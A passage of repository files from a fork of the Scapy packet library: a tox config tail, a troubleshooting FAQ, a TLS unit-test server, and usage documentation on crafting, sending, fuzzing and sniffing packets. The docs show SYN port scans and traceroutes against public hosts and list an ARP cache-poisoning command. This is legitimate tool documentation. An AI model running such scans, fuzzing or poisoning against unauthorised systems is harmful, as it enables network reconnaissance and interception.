combine\n\n\n[testenv:codecov]\ndescription = \"Upload coverage results to codecov\"\npassenv = TOXENV CI TRAVIS TRAVIS_*\ndeps = codecov\ncommands = codecov -e TOXENV\n\n\n[testenv:flake8]\ndescription = \"Check Scapy code style & quality\"\nskip_install = true\ndeps = flake8\ncommands = flake8 scapy/\n\n# flake8 configuration\n[flake8]\nselect = E1,E2,E30,E401,E502,E70,E71,\n F82,F402,F841,\n W2,W3\nexclude = scapy/modules/six.py,\n scapy/modules/winpcapy.py\n" }, { "alpha_fraction": 0.6384180784225464, "alphanum_fraction": 0.6622063517570496, "avg_line_length": 45.0684928894043, "blob_id": "062566adeb53711cb1ba311ca8053287a66d68ac", "content_id": "0aaf6ddb997adbf955a876ec00c49d1ef22630b7", "detected_licenses": [ "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3363, "license_type": "permissive", "max_line_length": 516, "num_lines": 73, "path": "/scapy/doc/scapy/troubleshooting.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "***************\nTroubleshooting\n***************\n\nFAQ\n===\n\nMy TCP connections are reset by Scapy or by my kernel.\n------------------------------------------------------\nThe kernel is not aware of what Scapy is doing behind his back. If Scapy sends a SYN, the target replies with a SYN-ACK and your kernel sees it, it will reply with a RST. To prevent this, use local firewall rules (e.g. NetFilter for Linux). Scapy does not mind about local firewalls.\n\nI can't ping 127.0.0.1. Scapy does not work with 127.0.0.1 or on the loopback interface \n---------------------------------------------------------------------------------------\n\nThe loopback interface is a very special interface. Packets going through it are not really assembled and disassembled. The kernel routes the packet to its destination while it is still stored an internal structure. What you see with tcpdump -i lo is only a fake to make you think everything is normal. The kernel is not aware of what Scapy is doing behind his back, so what you see on the loopback interface is also a fake. Except this one did not come from a local structure. Thus the kernel will never receive it.\n\nIn order to speak to local applications, you need to build your packets one layer upper, using a PF_INET/SOCK_RAW socket instead of a PF_PACKET/SOCK_RAW (or its equivalent on other systems than Linux)::\n\n >>> conf.L3socket\n <class __main__.L3PacketSocket at 0xb7bdf5fc>\n >>> conf.L3socket=L3RawSocket\n >>> sr1(IP(dst=\"127.0.0.1\")/ICMP())\n <IP version=4L ihl=5L tos=0x0 len=28 id=40953 flags= frag=0L ttl=64 proto=ICMP chksum=0xdce5 src=127.0.0.1 dst=127.0.0.1 options='' |<ICMP type=echo-reply code=0 chksum=0xffff id=0x0 seq=0x0 |>>\n\nBPF filters do not work. I'm on a ppp link\n------------------------------------------\n\nThis is a known bug. BPF filters must compiled with different offsets on ppp links. It may work if you use libpcap (which will be used to compile the BPF filter) instead of using native linux support (PF_PACKET sockets).\n\ntraceroute() does not work. I'm on a ppp link\n---------------------------------------------\n\nThis is a known bug. See BPF filters do not work. I'm on a ppp link\n\nTo work around this, use ``nofilter=1``::\n\n >>> traceroute(\"target\", nofilter=1)\n\n\nGraphs are ugly/fonts are too big/image is truncated.\n-----------------------------------------------------\n\nQuick fix: use png format::\n\n >>> x.graph(format=\"png\")\n \nUpgrade to latest version of GraphViz.\n\nTry providing different DPI options (50,70,75,96,101,125, for instance)::\n\n >>> x.graph(options=\"-Gdpi=70\")\n\nIf it works, you can make it permanenent::\n\n >>> conf.prog.dot = \"dot -Gdpi=70\"\n\nYou can also put this line in your ``~/.scapy_startup.py`` file \n\n\nGetting help\n============\n\nCommon problems are answered in the FAQ.\n\nIf you need additional help, please check out:\n\n* The `Gitter channel <https://gitter.im/secdev/scapy>`_\n* The `GitHub repository <https://github.com/secdev/scapy/>`_\n\nThere's also a low traffic mailing list at ``scapy.ml(at)secdev.org`` (`archive <http://news.gmane.org/gmane.comp.security.scapy.general>`_, `RSS, NNTP <http://gmane.org/info.php?group=gmane.comp.security.scapy.general>`_).\nSubscribe by sending a mail to ``scapy.ml-subscribe(at)secdev.org``.\n\nYou are encouraged to send questions, bug reports, suggestions, ideas, cool usages of Scapy, etc.\n" }, { "alpha_fraction": 0.6263157725334167, "alphanum_fraction": 0.6298245787620544, "avg_line_length": 30.66666603088379, "blob_id": "382f886d89dee74f697bdcee772ff9932cac6588", "content_id": "42848bc771c056defb977c65470e0466ee9bb2d8", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2280, "license_type": "permissive", "max_line_length": 86, "num_lines": 72, "path": "/scapy/test/tls/travis_test_server.py", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n## This file is part of Scapy\n## This program is published under a GPLv2 license\n\n\"\"\"\nTLS server used in unit tests.\n\nWhen some expected_data is provided, a TLS client (e.g. openssl s_client)\nshould send some application data after the handshake. If this data matches our\nexpected_data, then we leave with exit code 0. Else we leave with exit code 1.\nIf no expected_data was provided and the handshake was ok, we exit with 0.\n\"\"\"\n\nfrom ast import literal_eval\nimport os\nimport sys\nfrom contextlib import contextmanager\nfrom io import BytesIO, StringIO\n\nfrom scapy.modules import six\n\nbasedir = os.path.abspath(os.path.join(os.path.dirname(__file__),\n os.path.pardir, os.path.pardir))\nsys.path = [basedir] + sys.path\n\nfrom scapy.layers.tls.automaton_srv import TLSServerAutomaton\n\n\n@contextmanager\ndef captured_output():\n new_out, new_err = (StringIO(), StringIO()) if six.PY3 else (BytesIO(), BytesIO())\n old_out, old_err = sys.stdout, sys.stderr\n try:\n sys.stdout, sys.stderr = new_out, new_err\n yield sys.stdout, sys.stderr\n finally:\n sys.stdout, sys.stderr = old_out, old_err\n\ndef check_output_for_data(out, err, expected_data):\n errored = err.getvalue()\n if errored:\n return (False, errored)\n output = out.getvalue().strip()\n if expected_data:\n for data in output.split('> Received: ')[1:]:\n for line in literal_eval(data).split(b'\\n'):\n if line == expected_data:\n return (True, output)\n return (False, output)\n else:\n return (True, None)\n\ndef run_tls_test_server(expected_data, q):\n correct = False\n with captured_output() as (out, err):\n # Prepare automaton\n crt_basedir = os.path.join(basedir, 'test', 'tls', 'pki')\n t = TLSServerAutomaton(mycert=os.path.join(crt_basedir, 'srv_cert.pem'),\n mykey=os.path.join(crt_basedir, 'srv_key.pem'))\n # Sync threads\n q.put(True)\n # Run server automaton\n t.run()\n # Return correct answer\n correct, out_e = check_output_for_data(out, err, expected_data)\n # Return data\n q.put(out_e)\n if correct:\n sys.exit(0)\n else:\n sys.exit(1)\n" }, { "alpha_fraction": 0.47298574447631836, "alphanum_fraction": 0.6070298552513123, "avg_line_length": 41.41984558105469, "blob_id": "ee2788e404ee65ee41890f011c882b550f35c351", "content_id": "da7df77a2e73107b9e2b6cb3184a8270cd8f0000", "detected_licenses": [ "MIT", "GPL-2.0-only", "LicenseRef-scancode-other-permissive", "GPL-1.0-or-later" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 66717, "license_type": "permissive", "max_line_length": 638, "num_lines": 1572, "path": "/scapy/doc/scapy/usage.rst", "repo_name": "jreynders/BLESuite-1", "src_encoding": "UTF-8", "text": "*****\nUsage\n*****\n\nStarting Scapy\n==============\n\nScapy's interactive shell is run in a terminal session. Root privileges are needed to\nsend the packets, so we're using ``sudo`` here::\n \n $ sudo ./scapy\n Welcome to Scapy (2.4.0)\n >>> \n\nOn Windows, please open a command prompt (``cmd.exe``) and make sure that you have \nadministrator privileges::\n\n C:\\>scapy\n Welcome to Scapy (2.4.0)\n >>>\n\nIf you do not have all optional packages installed, Scapy will inform you that \nsome features will not be available:: \n \n INFO: Can't import python gnuplot wrapper . Won't be able to plot.\n INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().\n\nThe basic features of sending and receiving packets should still work, though. \n\nScreenshot\n----------\n\nIf you have installed IPython, scapy will hook to it and you will be able to use auto-completion using the TAB.\n\n.. image:: graphics/scapy-main-console.png\n :align: center\n\n\nInteractive tutorial\n====================\n\nThis section will show you several of Scapy's features.\nJust open a Scapy session as shown above and try the examples yourself.\n\n\nFirst steps\n-----------\n\nLet's build a packet and play with it::\n\n >>> a=IP(ttl=10) \n >>> a \n < IP ttl=10 |> \n >>> a.src \n ’127.0.0.1’ \n >>> a.dst=\"192.168.1.1\" \n >>> a \n < IP ttl=10 dst=192.168.1.1 |> \n >>> a.src \n ’192.168.8.14’ \n >>> del(a.ttl) \n >>> a \n < IP dst=192.168.1.1 |> \n >>> a.ttl \n 64 \n\nStacking layers\n---------------\n\nThe ``/`` operator has been used as a composition operator between two layers. When doing so, the lower layer can have one or more of its defaults fields overloaded according to the upper layer. (You still can give the value you want). A string can be used as a raw layer.\n\n::\n\n >>> IP()\n <IP |>\n >>> IP()/TCP()\n <IP frag=0 proto=TCP |<TCP |>>\n >>> Ether()/IP()/TCP()\n <Ether type=0x800 |<IP frag=0 proto=TCP |<TCP |>>>\n >>> IP()/TCP()/\"GET / HTTP/1.0\\r\\n\\r\\n\"\n <IP frag=0 proto=TCP |<TCP |<Raw load='GET / HTTP/1.0\\r\\n\\r\\n' |>>>\n >>> Ether()/IP()/IP()/UDP()\n <Ether type=0x800 |<IP frag=0 proto=IP |<IP frag=0 proto=UDP |<UDP |>>>>\n >>> IP(proto=55)/TCP()\n <IP frag=0 proto=55 |<TCP |>>\n\n\n.. image:: graphics/fieldsmanagement.png\n :scale: 90\n\nEach packet can be build or dissected (note: in Python ``_`` (underscore) is the latest result)::\n\n >>> raw(IP())\n 'E\\x00\\x00\\x14\\x00\\x01\\x00\\x00@\\x00|\\xe7\\x7f\\x00\\x00\\x01\\x7f\\x00\\x00\\x01'\n >>> IP(_)\n <IP version=4L ihl=5L tos=0x0 len=20 id=1 flags= frag=0L ttl=64 proto=IP\n chksum=0x7ce7 src=127.0.0.1 dst=127.0.0.1 |>\n >>> a=Ether()/IP(dst=\"www.slashdot.org\")/TCP()/\"GET /index.html HTTP/1.0 \\n\\n\"\n >>> hexdump(a) \n 00 02 15 37 A2 44 00 AE F3 52 AA D1 08 00 45 00 ...7.D...R....E.\n 00 43 00 01 00 00 40 06 78 3C C0 A8 05 15 42 23 .C....@.x<....B#\n FA 97 00 14 00 50 00 00 00 00 00 00 00 00 50 02 .....P........P.\n 20 00 BB 39 00 00 47 45 54 20 2F 69 6E 64 65 78 ..9..GET /index\n 2E 68 74 6D 6C 20 48 54 54 50 2F 31 2E 30 20 0A .html HTTP/1.0 .\n 0A .\n >>> b=raw(a)\n >>> b\n '\\x00\\x02\\x157\\xa2D\\x00\\xae\\xf3R\\xaa\\xd1\\x08\\x00E\\x00\\x00C\\x00\\x01\\x00\\x00@\\x06x<\\xc0\n \\xa8\\x05\\x15B#\\xfa\\x97\\x00\\x14\\x00P\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00P\\x02 \\x00\n \\xbb9\\x00\\x00GET /index.html HTTP/1.0 \\n\\n'\n >>> c=Ether(b)\n >>> c\n <Ether dst=00:02:15:37:a2:44 src=00:ae:f3:52:aa:d1 type=0x800 |<IP version=4L\n ihl=5L tos=0x0 len=67 id=1 flags= frag=0L ttl=64 proto=TCP chksum=0x783c\n src=192.168.5.21 dst=66.35.250.151 options='' |<TCP sport=20 dport=80 seq=0L\n ack=0L dataofs=5L reserved=0L flags=S window=8192 chksum=0xbb39 urgptr=0\n options=[] |<Raw load='GET /index.html HTTP/1.0 \\n\\n' |>>>>\n\nWe see that a dissected packet has all its fields filled. That's because I consider that each field has its value imposed by the original string. If this is too verbose, the method hide_defaults() will delete every field that has the same value as the default::\n\n >>> c.hide_defaults()\n >>> c\n <Ether dst=00:0f:66:56:fa:d2 src=00:ae:f3:52:aa:d1 type=0x800 |<IP ihl=5L len=67\n frag=0 proto=TCP chksum=0x783c src=192.168.5.21 dst=66.35.250.151 |<TCP dataofs=5L\n chksum=0xbb39 options=[] |<Raw load='GET /index.html HTTP/1.0 \\n\\n' |>>>>\n\nReading PCAP files\n------------------\n\n.. index::\n single: rdpcap()\n\nYou can read packets from a pcap file and write them to a pcap file. \n\n >>> a=rdpcap(\"/spare/captures/isakmp.cap\")\n >>> a\n <isakmp.cap: UDP:721 TCP:0 ICMP:0 Other:0>\n\nGraphical dumps (PDF, PS)\n-------------------------\n\n.. index::\n single: pdfdump(), psdump()\n\nIf you have PyX installed, you can make a graphical PostScript/PDF dump of a packet or a list of packets (see the ugly PNG image below. PostScript/PDF are far better quality...)::\n\n >>> a[423].pdfdump(layer_shift=1)\n >>> a[423].psdump(\"/tmp/isakmp_pkt.eps\",layer_shift=1)\n \n.. image:: graphics/isakmp_dump.png\n\n\n\n======================= ====================================================\nCommand Effect\n======================= ====================================================\nraw(pkt) assemble the packet\nhexdump(pkt) have a hexadecimal dump \nls(pkt) have the list of fields values \npkt.summary() for a one-line summary \npkt.show() for a developed view of the packet \npkt.show2() same as show but on the assembled packet (checksum is calculated, for instance) \npkt.sprintf() fills a format string with fields values of the packet \npkt.decode_payload_as() changes the way the payload is decoded \npkt.psdump() draws a PostScript diagram with explained dissection \npkt.pdfdump() draws a PDF with explained dissection \npkt.command() return a Scapy command that can generate the packet \n======================= ====================================================\n\n\n\nGenerating sets of packets\n--------------------------\n\nFor the moment, we have only generated one packet. Let see how to specify sets of packets as easily. Each field of the whole packet (ever layers) can be a set. This implicitly defines a set of packets, generated using a kind of cartesian product between all the fields.\n\n::\n\n >>> a=IP(dst=\"www.slashdot.org/30\")\n >>> a\n <IP dst=Net('www.slashdot.org/30') |>\n >>> [p for p in a]\n [<IP dst=66.35.250.148 |>, <IP dst=66.35.250.149 |>,\n <IP dst=66.35.250.150 |>, <IP dst=66.35.250.151 |>]\n >>> b=IP(ttl=[1,2,(5,9)])\n >>> b\n <IP ttl=[1, 2, (5, 9)] |>\n >>> [p for p in b]\n [<IP ttl=1 |>, <IP ttl=2 |>, <IP ttl=5 |>, <IP ttl=6 |>, \n <IP ttl=7 |>, <IP ttl=8 |>, <IP ttl=9 |>]\n >>> c=TCP(dport=[80,443])\n >>> [p for p in a/c]\n [<IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.148 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.149 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.150 |<TCP dport=443 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=80 |>>,\n <IP frag=0 proto=TCP dst=66.35.250.151 |<TCP dport=443 |>>]\n\nSome operations (like building the string from a packet) can't work on a set of packets. In these cases, if you forgot to unroll your set of packets, only the first element of the list you forgot to generate will be used to assemble the packet.\n\n=============== ====================================================\nCommand Effect\n=============== ====================================================\nsummary() displays a list of summaries of each packet \nnsummary() same as previous, with the packet number \nconversations() displays a graph of conversations \nshow() displays the preferred representation (usually nsummary()) \nfilter() returns a packet list filtered with a lambda function \nhexdump() returns a hexdump of all packets \nhexraw() returns a hexdump of the Raw layer of all packets \npadding() returns a hexdump of packets with padding \nnzpadding() returns a hexdump of packets with non-zero padding \nplot() plots a lambda function applied to the packet list \nmake table() displays a table according to a lambda function \n=============== ====================================================\n\n\n\nSending packets\n---------------\n\n.. index::\n single: Sending packets, send\n \nNow that we know how to manipulate packets. Let's see how to send them. The send() function will send packets at layer 3. That is to say, it will handle routing and layer 2 for you. The sendp() function will work at layer 2. It's up to you to choose the right interface and the right link layer protocol. send() and sendp() will also return sent packet list if return_packets=True is passed as parameter.\n\n::\n\n >>> send(IP(dst=\"1.2.3.4\")/ICMP())\n .\n Sent 1 packets.\n >>> sendp(Ether()/IP(dst=\"1.2.3.4\",ttl=(1,4)), iface=\"eth1\")\n ....\n Sent 4 packets.\n >>> sendp(\"I'm travelling on Ethernet\", iface=\"eth1\", loop=1, inter=0.2)\n ................^C\n Sent 16 packets.\n >>> sendp(rdpcap(\"/tmp/pcapfile\")) # tcpreplay\n ...........\n Sent 11 packets.\n \n Returns packets sent by send()\n >>> send(IP(dst='127.0.0.1'), return_packets=True)\n .\n Sent 1 packets.\n <PacketList: TCP:0 UDP:0 ICMP:0 Other:1>\n\n\nFuzzing\n-------\n\n.. index::\n single: fuzz(), fuzzing\n\nThe function fuzz() is able to change any default value that is not to be calculated (like checksums) by an object whose value is random and whose type is adapted to the field. This enables to quickly built fuzzing templates and send them in a loop. In the following example, the IP layer is normal, and the UDP and NTP layers are fuzzed. The UDP checksum will be correct, the UDP destination port will be overloaded by NTP to be 123 and the NTP version will be forced to be 4. All the other ports will be randomized. Note: If you use fuzz() in IP layer, src and dst parameter won't be random so in order to do that use RandIP().::\n\n >>> send(IP(dst=\"target\")/fuzz(UDP()/NTP(version=4)),loop=1)\n ................^C\n Sent 16 packets.\n\n\nSend and receive packets (sr)\n-----------------------------\n\n.. index::\n single: sr()\n\nNow, let's try to do some fun things. The sr() function is for sending packets and receiving answers. The function returns a couple of packet and answers, and the unanswered packets. The function sr1() is a variant that only returns one packet that answered the packet (or the packet set) sent. The packets must be layer 3 packets (IP, ARP, etc.). The function srp() do the same for layer 2 packets (Ethernet, 802.3, etc.). If there is, no response a None value will be assigned instead when the timeout is reached.\n\n::\n\n >>> p = sr1(IP(dst=\"www.slashdot.org\")/ICMP()/\"XXXXXXXXXXX\")\n Begin emission:\n ...Finished to send 1 packets.\n .*\n Received 5 packets, got 1 answers, remaining 0 packets\n >>> p\n <IP version=4L ihl=5L tos=0x0 len=39 id=15489 flags= frag=0L ttl=42 proto=ICMP\n chksum=0x51dd src=66.35.250.151 dst=192.168.5.21 options='' |<ICMP type=echo-reply\n code=0 chksum=0xee45 id=0x0 seq=0x0 |<Raw load='XXXXXXXXXXX'\n |<Padding load='\\x00\\x00\\x00\\x00' |>>>>\n >>> p.show()\n ---[ IP ]---\n version = 4L\n ihl = 5L\n tos = 0x0\n len = 39\n id = 15489\n flags = \n frag = 0L\n ttl = 42\n proto = ICMP\n chksum = 0x51dd\n src = 66.35.250.151\n dst = 192.168.5.21\n options = ''\n ---[ ICMP ]---\n type = echo-reply\n code = 0\n chksum = 0xee45\n id = 0x0\n seq = 0x0\n ---[ Raw ]---\n load = 'XXXXXXXXXXX'\n ---[ Padding ]---\n load = '\\x00\\x00\\x00\\x00'\n\n\n.. index::\n single: DNS, Etherleak\n\nA DNS query (``rd`` = recursion desired). The host 192.168.5.1 is my DNS server. Note the non-null padding coming from my Linksys having the Etherleak flaw::\n\n >>> sr1(IP(dst=\"192.168.5.1\")/UDP()/DNS(rd=1,qd=DNSQR(qname=\"www.slashdot.org\")))\n Begin emission:\n Finished to send 1 packets.\n ..*\n Received 3 packets, got 1 answers, remaining 0 packets\n <IP version=4L ihl=5L tos=0x0 len=78 id=0 flags=DF frag=0L ttl=64 proto=UDP chksum=0xaf38\n src=192.168.5.1 dst=192.168.5.21 options='' |<UDP sport=53 dport=53 len=58 chksum=0xd55d\n |<DNS id=0 qr=1L opcode=QUERY aa=0L tc=0L rd=1L ra=1L z=0L rcode=ok qdcount=1 ancount=1\n nscount=0 arcount=0 qd=<DNSQR qname='www.slashdot.org.' qtype=A qclass=IN |> \n an=<DNSRR rrname='www.slashdot.org.' type=A rclass=IN ttl=3560L rdata='66.35.250.151' |>\n ns=0 ar=0 |<Padding load='\\xc6\\x94\\xc7\\xeb' |>>>>\n\nThe \"send'n'receive\" functions family is the heart of scapy. They return a couple of two lists. The first element is a list of couples (packet sent, answer), and the second element is the list of unanswered packets. These two elements are lists, but they are wrapped by an object to present them better, and to provide them with some methods that do most frequently needed actions::\n\n >>> sr(IP(dst=\"192.168.8.1\")/TCP(dport=[21,22,23]))\n Received 6 packets, got 3 answers, remaining 0 packets\n (<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:0 ICMP:0 Other:0>)\n >>> ans, unans = _\n >>> ans.summary()\n IP / TCP 192.168.8.14:20 > 192.168.8.1:21 S ==> Ether / IP / TCP 192.168.8.1:21 > 192.168.8.14:20 RA / Padding\n IP / TCP 192.168.8.14:20 > 192.168.8.1:22 S ==> Ether / IP / TCP 192.168.8.1:22 > 192.168.8.14:20 RA / Padding\n IP / TCP 192.168.8.14:20 > 192.168.8.1:23 S ==> Ether / IP / TCP 192.168.8.1:23 > 192.168.8.14:20 RA / Padding\n \nIf there is a limited rate of answers, you can specify a time interval to wait between two packets with the inter parameter. If some packets are lost or if specifying an interval is not enough, you can resend all the unanswered packets, either by calling the function again, directly with the unanswered list, or by specifying a retry parameter. If retry is 3, scapy will try to resend unanswered packets 3 times. If retry is -3, scapy will resend unanswered packets until no more answer is given for the same set of unanswered packets 3 times in a row. The timeout parameter specify the time to wait after the last packet has been sent::\n\n >>> sr(IP(dst=\"172.20.29.5/30\")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)\n Begin emission:\n Finished to send 12 packets.\n Begin emission:\n Finished to send 9 packets.\n Begin emission:\n Finished to send 9 packets.\n \n Received 100 packets, got 3 answers, remaining 9 packets\n (<Results: UDP:0 TCP:3 ICMP:0 Other:0>, <Unanswered: UDP:0 TCP:9 ICMP:0 Other:0>)\n\n\nSYN Scans\n---------\n\n.. index::\n single: SYN Scan\n\nClassic SYN Scan can be initialized by executing the following command from Scapy's prompt::\n\n >>> sr1(IP(dst=\"72.14.207.99\")/TCP(dport=80,flags=\"S\"))\n\nThe above will send a single SYN packet to Google's port 80 and will quit after receiving a single response::\n\n Begin emission:\n .Finished to send 1 packets.\n *\n Received 2 packets, got 1 answers, remaining 0 packets\n <IP version=4L ihl=5L tos=0x20 len=44 id=33529 flags= frag=0L ttl=244\n proto=TCP chksum=0x6a34 src=72.14.207.99 dst=192.168.1.100 options=// |\n <TCP sport=www dport=ftp-data seq=2487238601L ack=1 dataofs=6L reserved=0L\n flags=SA window=8190 chksum=0xcdc7 urgptr=0 options=[('MSS', 536)] |\n <Padding load='V\\xf7' |>>>\n\nFrom the above output, we can see Google returned “SA” or SYN-ACK flags indicating an open port.\n\nUse either notations to scan ports 400 through 443 on the system:\n\n >>> sr(IP(dst=\"192.168.1.1\")/TCP(sport=666,dport=(440,443),flags=\"S\"))\n\nor\n\n >>> sr(IP(dst=\"192.168.1.1\")/TCP(sport=RandShort(),dport=[440,441,442,443],flags=\"S\"))\n\nIn order to quickly review responses simply request a summary of collected packets::\n\n >>> ans, unans = _\n >>> ans.summary()\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:440 S ======> IP / TCP 192.168.1.1:440 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:441 S ======> IP / TCP 192.168.1.1:441 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:442 S ======> IP / TCP 192.168.1.1:442 > 192.168.1.100:ftp-data RA / Padding\n IP / TCP 192.168.1.100:ftp-data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp-data SA / Padding\n\nThe above will display stimulus/response pairs for answered probes. We can display only the information we are interested in by using a simple loop:\n\n >>> ans.summary( lambda(s,r): r.sprintf(\"%TCP.sport% \\t %TCP.flags%\") )\n 440 RA\n 441 RA\n 442 RA\n https SA\n\nEven better, a table can be built using the ``make_table()`` function to display information about multiple targets::\n\n >>> ans, unans = sr(IP(dst=[\"192.168.1.1\",\"yahoo.com\",\"slashdot.org\"])/TCP(dport=[22,80,443],flags=\"S\"))\n Begin emission:\n .......*.**.......Finished to send 9 packets.\n **.*.*..*..................\n Received 362 packets, got 8 answers, remaining 1 packets\n >>> ans.make_table(\n ... lambda(s,r): (s.dst, s.dport,\n ... r.sprintf(\"{TCP:%TCP.flags%}{ICMP:%IP.src% - %ICMP.type%}\")))\n 66.35.250.150 192.168.1.1 216.109.112.135 \n 22 66.35.250.150 - dest-unreach RA - \n 80 SA RA SA \n 443 SA SA SA \n\nThe above example will even print the ICMP error type if the ICMP packet was received as a response instead of expected TCP.\n\nFor larger scans, we could be interested in displaying only certain responses. The example below will only display packets with the “SA” flag set::\n\n >>> ans.nsummary(lfilter = lambda (s,r): r.sprintf(\"%TCP.flags%\") == \"SA\")\n 0003 IP / TCP 192.168.1.100:ftp_data > 192.168.1.1:https S ======> IP / TCP 192.168.1.1:https > 192.168.1.100:ftp_data SA\n\nIn case we want to do some expert analysis of responses, we can use the following command to indicate which ports are open::\n\n >>> ans.summary(lfilter = lambda (s,r): r.sprintf(\"%TCP.flags%\") == \"SA\",prn=lambda(s,r):r.sprintf(\"%TCP.sport% is open\"))\n https is open\n\nAgain, for larger scans we can build a table of open ports::\n\n >>> ans.filter(lambda (s,r):TCP in r and r[TCP].flags&2).make_table(lambda (s,r): \n ... (s.dst, s.dport, \"X\"))\n 66.35.250.150 192.168.1.1 216.109.112.135 \n 80 X - X \n 443 X X X\n\nIf all of the above methods were not enough, Scapy includes a report_ports() function which not only automates the SYN scan, but also produces a LaTeX output with collected results::\n\n >>> report_ports(\"192.168.1.1\",(440,443))\n Begin emission:\n ...*.**Finished to send 4 packets.\n *\n Received 8 packets, got 4 answers, remaining 0 packets\n '\\\\begin{tabular}{|r|l|l|}\\n\\\\hline\\nhttps & open & SA \\\\\\\\\\n\\\\hline\\n440\n & closed & TCP RA \\\\\\\\\\n441 & closed & TCP RA \\\\\\\\\\n442 & closed & \n TCP RA \\\\\\\\\\n\\\\hline\\n\\\\hline\\n\\\\end{tabular}\\n'\n\n\nTCP traceroute\n--------------\n\n.. index::\n single: Traceroute\n\nA TCP traceroute::\n\n >>> ans, unans = sr(IP(dst=target, ttl=(4,25),id=RandShort())/TCP(flags=0x2))\n *****.******.*.***..*.**Finished to send 22 packets.\n ***......\n Received 33 packets, got 21 answers, remaining 1 packets\n >>> for snd,rcv in ans:\n ... print snd.ttl, rcv.src, isinstance(rcv.payload, TCP)\n ... \n 5 194.51.159.65 0\n 6 194.51.159.49 0\n 4 194.250.107.181 0\n 7 193.251.126.34 0\n 8 193.251.126.154 0\n 9 193.251.241.89 0\n 10 193.251.241.110 0\n 11 193.251.241.173 0\n 13 208.172.251.165 0\n 12 193.251.241.173 0\n 14 208.172.251.165 0\n 15 206.24.226.99 0\n 16 206.24.238.34 0\n 17 173.109.66.90 0\n 18 173.109.88.218 0\n 19 173.29.39.101 1\n 20 173.29.39.101 1\n 21 173.29.39.101 1\n 22 173.29.39.101 1\n 23 173.29.39.101 1\n 24 173.29.39.101 1\n\nNote that the TCP traceroute and some other high-level functions are already coded::\n\n >>> lsc()\n sr : Send and receive packets at layer 3\n sr1 : Send packets at layer 3 and return only the first answer\n srp : Send and receive packets at layer 2\n srp1 : Send and receive packets at layer 2 and return only the first answer\n srloop : Send a packet at layer 3 in loop and print the answer each time\n srploop : Send a packet at layer 2 in loop and print the answer each time\n sniff : Sniff packets\n p0f : Passive OS fingerprinting: which OS emitted this TCP SYN ?\n arpcachepoison : Poison target's cache with (your MAC,victim's IP) couple\n send : Send packets at layer 3\n sendp : Send packets at layer 2\n traceroute : Instant TCP traceroute\n arping : Send ARP who-has requests to determine which hosts are up\n ls : List available layers, or infos on a given layer\n lsc : List user commands\n queso : Queso OS fingerprinting\n nmap_fp : nmap fingerprinting\n report_ports : portscan a target and output a LaTeX table\n dyndns_add : Send a DNS add message to a nameserver for \"name\" to have a new \"rdata\"\n dyndns_del : Send a DNS delete message to a nameserver for \"name\"\n [...]\n\nScapy may also use the GeoIP2 module, in combination with matplotlib and `cartopy <http://scitools.org.uk/cartopy/docs/latest/installing.html>`_ to generate fancy graphics such as below:\n\n.. image:: graphics/traceroute_worldplot.png\n\nIn this example, we used the `traceroute_map()` function to print the graphic. This method is a shortcut which uses the `world_trace` of the `TracerouteResult` objects.\nIt could have been done differently:\n\n >>> conf.geoip_city = \"path/to/GeoLite2-City.mmdb\"\n >>> a = traceroute(\"www.google.co.uk\", verbose=0)[0]\n >>> b = traceroute(\"www.secdev.org\", verbose=0)[0]\n >>> a.res += b.res\n >>> a.world_trace()\n\nor such as above:\n\n >>> conf.geoip_city = \"path/to/GeoLite2-City.mmdb\"\n >>> traceroute_map(\"www.google.co.uk\", \"www.secdev.org\")\n\nTo use those functions, it is required to have installed the `geoip2 <https://pypi.python.org/pypi/geoip2>`_ module, `its database <https://dev.maxmind.com/geoip/geoip2/geolite2/>`_ (`direct download <https://geolite.maxmind.com/download/geoip/database/GeoLite2-City.tar.gz>`_)\nbut also the `cartopy <http://scitools.org.uk/cartopy/docs/latest/installing.html>`_ module.\n\nConfiguring super sockets\n-------------------------\n\n.. index::\n single: super socket\n\nThe process of sending packets and receiving is quite complicated. As I wanted to use the PF_PACKET interface to go through netfilter, I also needed to implement an ARP stack and ARP cache, and a LL stack. Well it seems to work, on ethernet and PPP interfaces, but I don't guarantee anything. Anyway, the fact I used a kind of super-socket for that mean that you can switch your IO layer very easily, and use PF_INET/SOCK_RAW, or use PF_PACKET at level 2 (giving the LL header (ethernet,...) and giving yourself mac addresses, ...). I've just added a super socket which use libdnet and libpcap, so that it should be portable::\n\n >>> conf.L3socket=L3dnetSocket\n >>> conf.L3listen=L3pcapListenSocket\n\nSniffing\n--------\n\n.. index::\n single: sniff()\n\nWe can easily capture some packets or even clone tcpdump or tshark. Either one interface or a list of interfaces to sniff on can be provided. If no interface is given, sniffing will happen on ``conf.iface``::\n\n >>> sniff(filter=\"icmp and host 66.35.250.151\", count=2)\n <Sniffed: UDP:0 TCP:0 ICMP:2 Other:0>\n >>> a=_\n >>> a.nsummary()\n 0000 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw\n 0001 Ether / IP / ICMP 192.168.5.21 echo-request 0 / Raw\n 